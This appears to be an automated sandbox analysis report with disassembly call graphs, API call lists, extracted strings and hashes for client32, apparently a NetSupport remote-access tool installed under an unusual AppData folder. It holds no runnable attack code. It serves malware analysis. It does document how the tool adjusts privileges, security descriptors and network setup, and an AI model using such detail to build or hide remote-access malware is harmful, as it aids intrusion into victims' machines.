1116ac7e __calloc_crt 66 API calls 77793->77795 77797 1117213c 77793->77797 77798 1116a3c6 77793->77798 77800 111721bc 77793->77800 77794 111721f2 GetStdHandle 77794->77800 77795->77793 77796 11172256 SetHandleCount 77796->77798 77797->77800 77801 11172173 InitializeCriticalSectionAndSpinCount 77797->77801 77802 11172168 GetFileType 77797->77802 77798->77734 77804 11177d99 77798->77804 77799 11172204 GetFileType 77799->77800 77800->77794 77800->77796 77800->77799 77803 1117222a InitializeCriticalSectionAndSpinCount 77800->77803 77801->77797 77801->77798 77802->77797 77802->77801 77803->77798 77803->77800 77805 11177db3 GetModuleFileNameA 77804->77805 77806 11177dae 77804->77806 77808 11177dda 77805->77808 77858 11171a45 94 API calls __setmbcp 77806->77858 77852 11177bff 77808->77852 77811 1116ac39 __malloc_crt 66 API calls 77812 11177e1c 77811->77812 77813 11177bff _parse_cmdline 76 API calls 77812->77813 77814 1116a3d6 77812->77814 77813->77814 77814->77738 77815 11177b23 77814->77815 77816 11177b2c 77815->77816 77820 11177b31 _strlen 77815->77820 77860 11171a45 94 API calls __setmbcp 77816->77860 77818 1116a3df 77818->77738 77831 1116e46e 77818->77831 77819 1116ac7e __calloc_crt 66 API calls 77827 11177b66 _strlen 77819->77827 77820->77818 77820->77819 77821 11177bb5 77822 11163aa5 _free 66 API calls 77821->77822 77822->77818 77823 1116ac7e __calloc_crt 66 API calls 77823->77827 77824 11177bdb 77825 11163aa5 _free 66 API calls 77824->77825 77825->77818 77826 1116cd5f _strcpy_s 66 API calls 77826->77827 77827->77818 77827->77821 77827->77823 77827->77824 77827->77826 77828 11177bf2 77827->77828 77829 1116ed72 __invoke_watson 10 API calls 77828->77829 77830 11177bfe 77829->77830 77832 1116e47c __IsNonwritableInCurrentImage 77831->77832 77861 1116d88b EncodePointer 77832->77861 77834 1116e49a __initterm_e 77836 1116e4bb __IsNonwritableInCurrentImage 77834->77836 77862 11163dd5 76 API calls __cinit 77834->77862 77836->77738 77837->77711 77838->77716 77839->77734 77840->77708 77841->77717 77842->77721 77843->77709 77844->77711 77845->77733 77846->77711 77847->77759 77848->77764 77849->77766 77850->77777 77851->77760 77854 11177c1e 77852->77854 77856 11177c8b 77854->77856 77859 11177590 76 API calls x_ismbbtype_l 77854->77859 77855 11177d89 77855->77811 77855->77814 77856->77855 77857 11177590 76 API calls _parse_cmdline 77856->77857 77857->77856 77858->77805 77859->77854 77860->77820 77861->77834 77862->77836 77864 11110474 EnterCriticalSection 77863->77864 77865 1111045f InitializeCriticalSection 77863->77865 77866 11110495 77864->77866 77865->77864 77867 111104c3 LeaveCriticalSection 77866->77867 77868 111103d0 ___DllMainCRTStartup 4 API calls 77866->77868 77867->77750 77868->77866 77869 11030b78 77870 11143630 267 API calls 77869->77870 77871 11030b86 77870->77871 77872 11143780 86 API calls 77871->77872 77873 11030bc3 77872->77873 77874 11030bd8 77873->77874 77875 11081e70 86 API calls 77873->77875 77876 110ed520 8 API calls 77874->77876 77875->77874 77877 11030bff 77876->77877 77887 11030c49 77877->77887 77937 110ed5d0 81 API calls 2 library calls 77877->77937 77879 11030c14 77938 110ed5d0 81 API calls 2 library calls 77879->77938 77881 11143780 86 API calls 77883 11030c60 77881->77883 77882 11030c2b 77885 11146fe0 19 API calls 77882->77885 77882->77887 77884 111101b0 std::_Mutex::_Mutex 265 API calls 77883->77884 77886 11030c6f 77884->77886 77885->77887 77888 11030c90 77886->77888 77889 11088b30 268 API calls 77886->77889 77887->77881 77890 1108a880 267 API calls 77888->77890 77889->77888 77891 11030ca3 OpenMutexA 77890->77891 77892 11030cc3 CreateMutexA 77891->77892 77893 11030dda CloseHandle 77891->77893 77894 11030ce3 77892->77894 77930 1108a980 77893->77930 77896 111101b0 std::_Mutex::_Mutex 265 API calls 77894->77896 77898 11030cf8 77896->77898 77897 11030df0 77901 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 77897->77901 77899 11030d1b 77898->77899 77900 11061710 293 API calls 77898->77900 77920 110161e0 LoadLibraryA 77899->77920 77900->77899 77902 11031773 77901->77902 77904 11030d2d 77905 11145c70 std::_Mutex::_Mutex 90 API calls 77904->77905 77906 11030d3c 77905->77906 77907 11030d49 77906->77907 77908 11030d5c 77906->77908 77921 111466b0 77907->77921 77910 11030d66 GetProcAddress 77908->77910 77911 11030d50 77908->77911 77910->77911 77912 11030d80 SetLastError 77910->77912 77913 110287a0 47 API calls 77911->77913 77912->77911 77914 11030d8d 77913->77914 77939 11009370 429 API calls std::_Mutex::_Mutex 77914->77939 77916 11030d9c 77917 11030db0 WaitForSingleObject 77916->77917 77917->77917 77918 11030dc2 CloseHandle 77917->77918 77918->77893 77919 11030dd3 FreeLibrary 77918->77919 77919->77893 77920->77904 77922 11145c70 std::_Mutex::_Mutex 90 API calls 77921->77922 77923 111466c2 77922->77923 77924 11146700 77923->77924 77925 111466c9 LoadLibraryA 77923->77925 77924->77911 77926 111466fa 77925->77926 77927 111466db GetProcAddress 77925->77927 77926->77911 77928 111466f3 FreeLibrary 77927->77928 77929 111466eb 77927->77929 77928->77926 77929->77928 77931 1108aa27 77930->77931 77935 1108a9ba std::ios_base::_Tidy 77930->77935 77932 1108aa2e DeleteCriticalSection 77931->77932 77940 1115c2d0 77932->77940 77933 1108a9ce CloseHandle 77933->77935 77935->77931 77935->77933 77936 1108aa54 std::ios_base::_Tidy 77936->77897 77937->77879 77938->77882 77939->77916 77943 1115c2e4 77940->77943 77941 1115c2e8 77941->77936 77943->77941 77944 1115c040 67 API calls 2 library calls 77943->77944 77944->77943

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 1109E5B0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 774 1109e5b0-1109e612 call 1109dda0 777 1109e618-1109e63b call 1109d860 774->777 778 1109ec30 774->778 784 1109e641-1109e655 LocalAlloc 777->784 785 1109e7a4-1109e7a6 777->785 780 1109ec32-1109ec4d call 11162bb7 778->780 786 1109e65b-1109e68d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 784->786 787 1109ec25-1109ec2b call 1109d8f0 784->787 788 1109e736-1109e75b CreateFileMappingA 785->788 791 1109e71a-1109e730 786->791 792 1109e693-1109e6be call 1109d7d0 call 1109d810 786->792 787->778 789 1109e7a8-1109e7bb GetLastError 788->789 790 1109e75d-1109e77d GetLastError call 110d6c20 788->790 796 1109e7bd 789->796 797 1109e7c2-1109e7d9 MapViewOfFile 789->797 805 1109e788-1109e790 790->805 806 1109e77f-1109e786 LocalFree 790->806 791->788 823 1109e709-1109e711 792->823 824 1109e6c0-1109e6f6 GetSecurityDescriptorSacl 792->824 796->797 798 1109e7db-1109e7f6 call 110d6c20 797->798 799 1109e817-1109e81f 797->799 817 1109e7f8-1109e7f9 LocalFree 798->817 818 1109e7fb-1109e803 798->818 803 1109e8c1-1109e8d3 799->803 804 1109e825-1109e83e GetModuleFileNameA 799->804 809 1109e919-1109e932 call 11162be0 GetTickCount 803->809 810 1109e8d5-1109e8d8 803->810 811 1109e8dd-1109e8f8 call 110d6c20 804->811 812 1109e844-1109e84d 804->812 813 1109e792-1109e793 LocalFree 805->813 814 1109e795-1109e79f 805->814 806->805 835 1109e934-1109e939 809->835 819 1109e9bf-1109ea23 GetCurrentProcessId GetModuleFileNameA call 1109dc30 810->819 839 1109e8fa-1109e8fb LocalFree 811->839 840 1109e8fd-1109e905 811->840 812->811 820 1109e853-1109e856 812->820 813->814 822 1109ec1e-1109ec20 call 1109dce0 814->822 817->818 828 1109e808-1109e812 818->828 829 1109e805-1109e806 LocalFree 818->829 844 1109ea2b-1109ea42 CreateEventA 819->844 845 1109ea25 819->845 831 1109e899-1109e8bc call 110d6c20 call 1109dce0 820->831 832 1109e858-1109e85c 820->832 822->787 823->791 826 1109e713-1109e714 FreeLibrary 823->826 824->823 825 1109e6f8-1109e703 SetSecurityDescriptorSacl 824->825 825->823 826->791 828->822 829->828 831->803 832->831 838 1109e85e-1109e869 832->838 841 1109e93b-1109e94a 835->841 842 1109e94c 835->842 846 1109e870-1109e874 838->846 839->840 847 1109e90a-1109e914 840->847 848 1109e907-1109e908 LocalFree 840->848 841->835 841->842 849 1109e94e-1109e954 842->849 853 1109ea44-1109ea63 GetLastError * 2 call 110d6c20 844->853 854 1109ea66-1109ea6e 844->854 845->844 851 1109e890-1109e892 846->851 852 1109e876-1109e878 846->852 847->822 848->847 859 1109e965-1109e9bd 849->859 860 1109e956-1109e963 849->860 856 1109e895-1109e897 851->856 861 1109e87a-1109e880 852->861 862 1109e88c-1109e88e 852->862 853->854 857 1109ea70 854->857 858 1109ea76-1109ea87 CreateEventA 854->858 856->811 856->831 857->858 865 1109ea89-1109eaa8 GetLastError * 2 call 110d6c20 858->865 866 1109eaab-1109eab3 858->866 859->819 860->849 860->859 861->851 863 1109e882-1109e88a 861->863 862->856 863->846 863->862 865->866 868 1109eabb-1109eacd CreateEventA 866->868 869 1109eab5 866->869 871 1109eacf-1109eaee GetLastError * 2 call 110d6c20 868->871 872 1109eaf1-1109eaf9 868->872 869->868 871->872 874 1109eafb 872->874 875 1109eb01-1109eb12 CreateEventA 872->875 874->875 876 1109eb34-1109eb42 875->876 877 1109eb14-1109eb31 GetLastError * 2 call 110d6c20 875->877 880 1109eb44-1109eb45 LocalFree 876->880 881 1109eb47-1109eb4f 876->881 877->876 880->881 883 1109eb51-1109eb52 LocalFree 881->883 884 1109eb54-1109eb5d 881->884 883->884 885 1109eb63-1109eb66 884->885 886 1109ec07-1109ec19 call 110d6c20 884->886 885->886 888 1109eb6c-1109eb6f 885->888 886->822 888->886 890 1109eb75-1109eb78 888->890 890->886 891 1109eb7e-1109eb81 890->891 892 1109eb8c-1109eba8 CreateThread 891->892 893 1109eb83-1109eb89 GetCurrentThreadId 891->893 894 1109ebaa-1109ebb4 892->894 895 1109ebb6-1109ebc0 892->895 893->892 894->822 896 1109ebda-1109ec05 SetEvent call 110d6c20 call 1109d8f0 895->896 897 1109ebc2-1109ebd8 ResetEvent * 3 895->897 896->780 897->896
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,1EF76653,00080000,00000000,?), ref: 1109D88D
                                                                                                                                                      • Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                                                                                      • Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                                                                                      • Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,1EF76653,00080000,00000000,?), ref: 1109E645
                                                                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
                                                                                                                                                    • GetVersionExA.KERNEL32(?), ref: 1109E680
                                                                                                                                                    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
                                                                                                                                                    • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
                                                                                                                                                    • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,11030703,00000004,00000000,?,?), ref: 1109E750
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109E75D
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109E786
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109E793
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109E7B0
                                                                                                                                                    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109E7F9
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109E806
                                                                                                                                                      • Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E69E), ref: 1109D7D8
                                                                                                                                                      • Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109E8FB
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109E908
                                                                                                                                                    • _memset.LIBCMT ref: 1109E920
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1109E928
                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 1109E9D4
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109EA44
                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109EA4B
                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109EA89
                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109EA90
                                                                                                                                                    • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109EACF
                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109EAD6
                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109EB1A
                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109EB1D
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109EB45
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109EB52
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1109EB83
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109EBCC
                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109EBD2
                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109EBD8
                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 1109EBDE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                                                                    • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                                                                    • API String ID: 3291243470-2792520954
                                                                                                                                                    • Opcode ID: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                                                                                    • Instruction ID: a3fd055aacadca8d823d44ca49761fd5d24e706f53ed4dbc48f97bf713fa71f6
                                                                                                                                                    • Opcode Fuzzy Hash: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                                                                                    • Instruction Fuzzy Hash: A612B2B5E0026D9FEB24DF60CDD4EAAB7BAFB88304F0049A9E51D97640D671AD84CF50
                                                                                                                                                    Function 6CA97030 Relevance: 91.4, APIs: 21, Strings: 31, Instructions: 406threadlibrarysynchronizationCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 902 6ca97030-6ca97050 call 6ca82a90 call 6ca9dbd0 907 6ca97052-6ca97095 LoadLibraryA 902->907 908 6ca97097 902->908 909 6ca97099-6ca970f8 call 6ca88d00 InitializeCriticalSection CreateEventA 907->909 908->909 912 6ca970fa-6ca9710e call 6ca86f50 909->912 913 6ca97111-6ca9711e CreateEventA 909->913 912->913 915 6ca97120-6ca97134 call 6ca86f50 913->915 916 6ca97137-6ca97144 CreateEventA 913->916 915->916 919 6ca9715d-6ca97170 WSAStartup 916->919 920 6ca97146-6ca9715a call 6ca86f50 916->920 921 6ca97183-6ca971b2 call 6caa1b69 919->921 922 6ca97172-6ca97182 call 6ca85290 call 6ca82b70 919->922 920->919 931 6ca971d0-6ca971e4 _memset 921->931 932 6ca971b4-6ca971cd call 6ca86f50 921->932 935 6ca971fa-6ca97202 931->935 936 6ca971e6-6ca971e9 931->936 932->931 937 6ca97209-6ca97223 call 6caa3753 935->937 938 6ca97204 935->938 936->935 940 6ca971eb-6ca971f1 936->940 944 6ca9723c-6ca97255 call 6ca99bf0 937->944 945 6ca97225-6ca97239 call 6ca86f50 937->945 938->937 940->935 942 6ca971f3-6ca971f8 940->942 942->937 950 6ca9726a-6ca97271 call 6ca85730 944->950 951 6ca97257-6ca9725e 944->951 945->944 955 6ca9730b-6ca97310 950->955 956 6ca97277-6ca9729a call 6caa1b69 950->956 952 6ca97260-6ca97268 951->952 952->950 952->952 958 6ca9731e-6ca97336 call 6ca85e90 call 6ca85530 955->958 959 6ca97312-6ca97315 955->959 964 6ca9729c-6ca972bb call 6ca86f50 956->964 965 6ca972be-6ca972dc _memset call 6caa1b69 956->965 963 6ca97339-6ca97354 call 6ca85e90 958->963 959->958 962 6ca97317-6ca9731c 959->962 962->958 962->963 977 6ca97361-6ca9738b GetTickCount CreateThread 963->977 978 6ca97356-6ca9735c 963->978 964->965 975 6ca972fa-6ca97308 _memset 965->975 976 6ca972de-6ca972f7 call 6ca86f50 965->976 975->955 976->975 980 6ca973a9-6ca973b6 SetThreadPriority 977->980 981 6ca9738d-6ca973a6 call 6ca86f50 977->981 978->977 984 6ca973b8-6ca973cc call 6ca86f50 980->984 985 6ca973cf-6ca973ed call 6ca85f20 call 6ca85e90 980->985 981->980 984->985 993 6ca973ef 985->993 994 6ca973f5-6ca973f7 985->994 993->994 995 6ca973f9-6ca97407 call 6ca9dbd0 994->995 996 6ca97425-6ca97447 GetModuleFileNameA call 6ca82420 994->996 1003 6ca97409-6ca9741c call 6ca84580 995->1003 1004 6ca9741e 995->1004 1001 6ca97449-6ca9744a 996->1001 1002 6ca9744c 996->1002 1005 6ca97451-6ca9746d 1001->1005 1002->1005 1007 6ca97420 1003->1007 1004->1007 1008 6ca97470-6ca9747f 1005->1008 1007->996 1008->1008 1010 6ca97481-6ca97486 1008->1010 1011 6ca97487-6ca9748d 1010->1011 1011->1011 1012 6ca9748f-6ca974c8 GetPrivateProfileIntA GetModuleHandleA 1011->1012 1013 6ca974ce-6ca974fa call 6ca85e90 * 2 1012->1013 1014 6ca97563-6ca9758f CreateMutexA timeBeginPeriod 1012->1014 1019 6ca974fc-6ca97511 call 6ca85e90 1013->1019 1020 6ca97536-6ca9755d call 6ca85e90 * 2 1013->1020 1025 6ca9752a-6ca97530 1019->1025 1026 6ca97513-6ca97528 call 6ca85e90 1019->1026 1020->1014 1025->1020 1026->1020 1026->1025
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6CA82A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6CA82ACB
                                                                                                                                                      • Part of subcall function 6CA82A90: _strrchr.LIBCMT ref: 6CA82ADA
                                                                                                                                                      • Part of subcall function 6CA82A90: _strrchr.LIBCMT ref: 6CA82AEA
                                                                                                                                                      • Part of subcall function 6CA82A90: wsprintfA.USER32 ref: 6CA82B05
                                                                                                                                                      • Part of subcall function 6CA9DBD0: _malloc.LIBCMT ref: 6CA9DBE9
                                                                                                                                                      • Part of subcall function 6CA9DBD0: wsprintfA.USER32 ref: 6CA9DC04
                                                                                                                                                      • Part of subcall function 6CA9DBD0: _memset.LIBCMT ref: 6CA9DC27
                                                                                                                                                    • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6CA97057
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(6CACB898), ref: 6CA970DF
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6CA970EF
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6CA97115
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6CA9713B
                                                                                                                                                    • WSAStartup.WSOCK32(00000101,6CACB91A), ref: 6CA97167
                                                                                                                                                    • _malloc.LIBCMT ref: 6CA971A3
                                                                                                                                                      • Part of subcall function 6CAA1B69: __FF_MSGBANNER.LIBCMT ref: 6CAA1B82
                                                                                                                                                      • Part of subcall function 6CAA1B69: __NMSG_WRITE.LIBCMT ref: 6CAA1B89
                                                                                                                                                      • Part of subcall function 6CAA1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6CAAD3C1,6CAA6E81,00000001,6CAA6E81,?,6CAAF447,00000018,6CAC7738,0000000C,6CAAF4D7), ref: 6CAA1BAE
                                                                                                                                                    • _memset.LIBCMT ref: 6CA971D3
                                                                                                                                                    • _calloc.LIBCMT ref: 6CA97214
                                                                                                                                                    • _malloc.LIBCMT ref: 6CA9728B
                                                                                                                                                    • _memset.LIBCMT ref: 6CA972C1
                                                                                                                                                    • _malloc.LIBCMT ref: 6CA972CD
                                                                                                                                                    • _memset.LIBCMT ref: 6CA97303
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA97361
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00004000,6CA96BA0,00000000,00000000,6CACBACC), ref: 6CA9737E
                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6CA973AC
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Support\,00000104), ref: 6CA97430
                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Support\pci.ini), ref: 6CA974B0
                                                                                                                                                    • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6CA974C0
                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6CA97566
                                                                                                                                                    • timeBeginPeriod.WINMM(00000001), ref: 6CA97573
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                                                                                    • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$0/su$358075$C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Support\$C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Support\pci.ini$General$HTCTL32$NSM303008$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                                                                                    • API String ID: 3160247386-2525493421
                                                                                                                                                    • Opcode ID: d787df4b9ef540ebe592d12303e56b1f90b0f73a378fb0676cbc2f120e09f35d
                                                                                                                                                    • Instruction ID: 711667c537b1a59ab67a2f49a43559f30f25b5be86bcca2c97dcf3029bf0ee10
                                                                                                                                                    • Opcode Fuzzy Hash: d787df4b9ef540ebe592d12303e56b1f90b0f73a378fb0676cbc2f120e09f35d
                                                                                                                                                    • Instruction Fuzzy Hash: 42D1F8B0B10305AFE714AF689DC995676F8BB0530CB048A29F509D7B01E731D9C98BB2
                                                                                                                                                    Function 11029BB0 Relevance: 88.0, APIs: 38, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1031 11029bb0-11029c3e LoadLibraryA 1032 11029c41-11029c46 1031->1032 1033 11029c48-11029c4b 1032->1033 1034 11029c4d-11029c50 1032->1034 1035 11029c65-11029c6a 1033->1035 1036 11029c52-11029c55 1034->1036 1037 11029c57-11029c62 1034->1037 1038 11029c99-11029ca5 1035->1038 1039 11029c6c-11029c71 1035->1039 1036->1035 1037->1035 1040 11029d4a-11029d4d 1038->1040 1041 11029cab-11029cc3 call 11163a11 1038->1041 1042 11029c73-11029c8a GetProcAddress 1039->1042 1043 11029c8c-11029c8f 1039->1043 1045 11029d68-11029d80 InternetOpenA 1040->1045 1046 11029d4f-11029d66 GetProcAddress 1040->1046 1052 11029ce4-11029cf0 1041->1052 1053 11029cc5-11029cde GetProcAddress 1041->1053 1042->1043 1047 11029c91-11029c93 SetLastError 1042->1047 1043->1038 1051 11029da4-11029db0 call 11163aa5 1045->1051 1046->1045 1050 11029d99-11029da1 SetLastError 1046->1050 1047->1038 1050->1051 1059 11029db6-11029de7 call 11142e60 call 11165250 1051->1059 1060 1102a02a-1102a034 1051->1060 1058 11029cf2-11029cfb GetLastError 1052->1058 1063 11029d11-11029d13 1052->1063 1053->1052 1055 11029d82-11029d8a SetLastError 1053->1055 1055->1058 1058->1063 1064 11029cfd-11029d0f call 11163aa5 call 11163a11 1058->1064 1081 11029de9-11029dec 1059->1081 1082 11029def-11029e04 call 11081d30 * 2 1059->1082 1060->1032 1062 1102a03a 1060->1062 1066 1102a04c-1102a04f 1062->1066 1067 11029d30-11029d3c 1063->1067 1068 11029d15-11029d2e GetProcAddress 1063->1068 1064->1063 1072 1102a051-1102a056 1066->1072 1073 1102a05b-1102a05e 1066->1073 1067->1040 1085 11029d3e-11029d47 1067->1085 1068->1067 1071 11029d8f-11029d97 SetLastError 1068->1071 1071->1040 1077 1102a1bf-1102a1c7 1072->1077 1078 1102a060-1102a065 1073->1078 1079 1102a06a 1073->1079 1083 